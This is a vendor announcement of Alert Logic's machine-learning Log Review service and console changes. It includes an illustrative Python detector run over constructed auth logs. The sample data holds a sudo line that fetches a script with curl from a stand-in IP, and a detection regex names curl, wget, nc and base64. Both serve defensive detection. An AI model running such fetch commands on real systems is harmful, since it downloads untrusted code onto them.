Alert Logic® Machine Learning Log Review lets Professional and Enterprise Managed Detection & Response and Cloud Defender customers and partners continue to meet log review compliance requirements while gaining additional security value. It pairs machine learning with human expertise: models learn your organization's trends and patterns at the account, user, and host levels to detect log-based incidents, while our expert teams provide guidance, custom tuning, and manual checks. Log Review also now supports detection of anomalous activity in Microsoft Azure environments.
This update also includes enhancements to Alert Logic console incident features, which improve the capability for customers to efficiently review data and quickly identify what information is important to them, and new and updated reports.
Benefits of Machine Learning Log Review
Previously, Log Review relied on fixed anomaly-type triggers and human review to identify anomalies. With machine learning-powered Log Review, Alert Logic applies a machine learning-trained threshold that is customized for each customer and accounts for relatively high message counts, unusual locations, and unusual hostnames, while experts handle special customer requests.
Several benefits of the machine learning model for reviewing logs include:
- Faster and more efficient review
- A dramatic expansion of anomalies detection capabilities
- Improved accuracy
- Machine learning-based detection expanded from the previous six UBAD-based detections to more than 100 anomaly scenarios based on time series, location, and unusual names
- Rule-based detection that utilizes customer preferences
- Significantly more security value
- Automatic, reliable detection of anomalies based on each customer's own data trends
New Log Review Experience
Log Review details are now classified as incidents and can be found within the Alert Logic console at (navigation menu) > Respond > Incidents. To view only Log Review information, click Log Review under Detection Source in the left-hand filter bar. The incident classification of Log Review incidents, titled Log Review Summary incidents, has changed and now includes:
- Threat Level: Info
- Escalation: Not escalated
- Classification: Log Review
Each day, one Log Review Summary incident is raised if the machine learning models detect any log anomalies in the customer environment. Machine learning log anomaly detection automates all anomaly-based detection for Windows, UNIX/Linux, Amazon Web Services (AWS), Microsoft Azure, network, and database logs, and rule-based detection for Windows and UNIX/Linux logs. Examples of log data that Alert Logic reviews include:
- Windows: Failed logins, changes to privileges, changes to accounts, Active Directory global catalog changes, and others
- UNIX/Linux: Sudo access, SSH failed logins, switched user common success/fails, and others
- AWS: MFA, security group changes, IAM, EC2, S3 changes, user account and access changes, network control changes, and others
- Azure: Backup, user file access, user login activity, user network security events, OAuth2 grant activity, object access, user role modification activity, service principal activity, user group modification
Incident details list the users and hosts for which anomalies were raised, as well as the types of alerts triggered, based on the log anomaly aggregation. On the incident Evidence page, you will find additional information in the Log Review anomaly type summary, user summary, and host summary. Two detection techniques can trigger an anomaly:
- Anomaly detection: an anomaly is triggered when activity deviates from the machine learning model computed for the user or host. Because the trigger is the model rather than a particular event, no specific logs are listed as evidence within a Log Review Summary incident.
- Pattern matching: logs associated with a suspicious command or IP address trigger an anomaly; those logs are listed in the Log Review Summary incident evidence.
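To make the two techniques concrete, the following is an added illustration written for this page; it is not Alert Logic's code and does not describe its models. It runs a per-user baseline threshold (time series) and a never-seen-before country check (location) over constructed Linux auth-log records, plus a pattern match for a suspicious sudo command or a watchlisted IP, and builds a single daily summary in which only the pattern hits carry raw log lines. The record format, the mean plus three standard deviations threshold, the command list and the watchlist are all assumptions.

```python
import re
import statistics
from collections import Counter, defaultdict

# Constructed sample records for this example (invented, not Alert Logic data).
# Each record is (day, user, source_country, message). Days 1-7 are the
# baseline window and day 8 is the day under review.
def _failed(day, user, country, n):
    msg = f"Failed password for {user} from 203.0.113.5 port 22 ssh2"
    return [(day, user, country, msg)] * n

RECORDS = []
for day, n in zip(range(1, 8), [2, 1, 3, 2, 2, 1, 3]):  # alice's normal noise
    RECORDS += _failed(day, "alice", "US", n)
RECORDS += _failed(8, "alice", "US", 25)                 # spike on the review day
RECORDS += [(d, "bob", "DE", "Accepted publickey for bob from 198.51.100.7 port 22 ssh2")
            for d in range(1, 9)]
RECORDS += [
    (8, "bob", "RU", "Accepted publickey for bob from 192.0.2.9 port 22 ssh2"),
    (8, "bob", "DE", "bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; "
                     "COMMAND=/usr/bin/curl http://192.0.2.9/x.sh"),
    (8, "bob", "DE", "bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/apt-get update"),
]

# Assumed indicators for the pattern-matching path; a real service would use the
# customer's own preferences and threat intelligence rather than this short list.
FAILED_RE = re.compile(r"^Failed password for (?:invalid user )?\S+")
SUSPICIOUS_CMD_RE = re.compile(r"COMMAND=\S*/(curl|wget|nc|ncat|base64)\b")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
WATCHLIST_IPS = {"192.0.2.9"}


def failed_login_counts(records, user, days):
    """Per-day failed-login counts for one user; days with no failures count as 0."""
    per_day = Counter(d for d, u, _, msg in records
                      if u == user and d in days and FAILED_RE.match(msg))
    return [per_day.get(d, 0) for d in days]


def volume_anomalies(records, review_day, baseline_days, k=3.0, min_count=3):
    """Flag users whose failed-login count on review_day exceeds a threshold learned
    from their own baseline (mean + k * stdev), floored at min_count so that a user
    with a flat, near-zero history is not flagged by a single extra failure."""
    flagged = {}
    for user in sorted({u for _, u, _, _ in records}):
        base = failed_login_counts(records, user, baseline_days)
        today = failed_login_counts(records, user, [review_day])[0]
        mean = statistics.mean(base)
        sd = statistics.stdev(base) if len(base) > 1 else 0.0
        threshold = max(mean + k * sd, min_count)
        if today > threshold:
            flagged[user] = {"count": today, "threshold": round(threshold, 2)}
    return flagged


def location_anomalies(records, review_day, baseline_days):
    """Flag (user, country) pairs seen on review_day but never in that user's baseline.
    A user with no baseline at all is flagged from any country."""
    seen = defaultdict(set)
    for d, u, c, _ in records:
        if d in baseline_days:
            seen[u].add(c)
    return sorted({(u, c) for d, u, c, _ in records
                   if d == review_day and c not in seen[u]})


def pattern_matches(records, review_day):
    """Return the raw log lines on review_day that hit a suspicious command or a
    watchlisted IP. Unlike the two model-based checks above, these lines are the
    evidence, so they are returned verbatim."""
    hits = []
    for d, u, _, msg in records:
        if d != review_day:
            continue
        if SUSPICIOUS_CMD_RE.search(msg):
            hits.append((u, "suspicious_command", msg))
        elif WATCHLIST_IPS & set(IP_RE.findall(msg)):
            hits.append((u, "watchlist_ip", msg))
    return hits


def daily_summary(records, review_day, baseline_days):
    """Build one summary for the day, or None if nothing fired."""
    vol = volume_anomalies(records, review_day, baseline_days)
    loc = location_anomalies(records, review_day, baseline_days)
    pat = pattern_matches(records, review_day)
    if not (vol or loc or pat):
        return None
    types = {kind for _, kind, _ in pat}
    if vol:
        types.add("failed_login_volume")
    if loc:
        types.add("unusual_location")
    return {
        "day": review_day,
        "anomaly_types": sorted(types),
        "anomalous_users": sorted(set(vol) | {u for u, _ in loc} | {u for u, _, _ in pat}),
        "model_anomalies": {"volume": vol, "location": loc},  # counts and thresholds only
        "evidence_logs": pat,                                  # raw lines, pattern hits only
    }


if __name__ == "__main__":
    import json
    print(json.dumps(daily_summary(RECORDS, 8, range(1, 8)), indent=2))
```

Running the script summarises day 8: alice is flagged for 25 failed logins against a learned threshold of about 4.45, bob is flagged for a never-seen country, and the two pattern hits for bob (the watchlisted IP and the curl command run under sudo) are the only entries that carry the original log lines. Day 5 against a days 1 to 4 baseline produces no summary at all, matching the one-incident-per-day-only-when-something-fires behaviour described above.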
User Experience Changes
Customers will experience some changes associated with Log Review notifications and incidents based on their service level.
Cloud Defender Customers
Cloud Defender customers, including Log Manager customers with Log Review and Threat and Log Manager customers, will notice a new experience when navigating and managing incidents. Previously, Cloud Defender customers found Log Review cases in the Alert Logic console at Search > Cases. Log Review information is now found under Respond > Incidents. Customers will now receive one new Log Review Summary incident a day covering Windows, Linux, AWS, Azure, network, and database log activity, with new information such as user- and host-level anomaly incident evidence, as well as up to 16 case-based Log Review incidents.
Managed Detection & Response Customers
Managed Detection & Response customers can find Log Review information where they have always found it, at Respond > Incidents. Customers will now receive one new Log Review Summary incident a day covering Windows, Linux, AWS, Azure, network, and database log activity, with new information such as user- and host-level anomaly incident evidence, as well as up to 16 case-based Log Review incidents.
Incident Console Enhancements
Several improvements have been made to the Incident console—found within the Alert Logic console at Respond > Incidents—to support both the new Log Review Summary incident configuration and comprehensive customer consumption of their most important incident information.
The Incident List column structure has been enhanced to show more information at a glance. You can choose which columns appear in your Incident List table, and drag, resize, and sort each column. A preview panel to the right of the table shows additional information about the incident currently at the top of your screen and updates as you scroll.
Status and other filters are available for multi-selection and very granular filtering, and these can be reset quickly by clicking Clear All Filters above the filters. You can also download all incidents that match your current filters to CSV.
Note: To see only Log Review Summary incidents, filter only for Log Review under Detection Source.
To see more information on an incident, click it in the Incident List table to open the Incident Detail page. Investigation and Recommendation information have been combined into one panel, which provides an attack summary, an overview of log alerts and anomalies, a recommended course of action, and the audit log and notification history.
The Evidence page contains a timeline of all notable occurrences regarding the incident and allows you to dig into each piece of evidence for more granular data. Machine learning-generated Log Review Summary incidents contain three tiers of analytics, and customers can review top-level incident details like alert types, alert counts, anomalous users, and anomalous hosts, as well as drill down into any piece of evidence for more layers of observations and evidence.
New and improved incident reports are available for Cloud Defender and Managed Detection & Response customers.
Incident Daily Digest
The Incident Daily Digest report contains new graphical data on the last 30 days of incidents, as well as a list of incidents and summary information. From the report, you can easily drill into more detailed information within the Alert Logic console. The report is sent daily, as long as incidents were generated that day. The Incident Daily Digest report can be found in the Alert Logic console at Validate > Reports > Threats > Incident Analysis > Incident Daily Digest.
Monthly Log Review Report
The Monthly Log Review report is now available to both Cloud Defender and Managed Detection & Response customers; previously it was not available to Cloud Defender customers. This report contains new graphical data on the last 30 days of Log Review-related incidents, as well as additional statistics. The Monthly Log Review report can be found in the Alert Logic console at Validate > Reports > Threats > Log Review Analysis > Monthly Log Review.
For additional technical details, see the Alert Logic Documentation: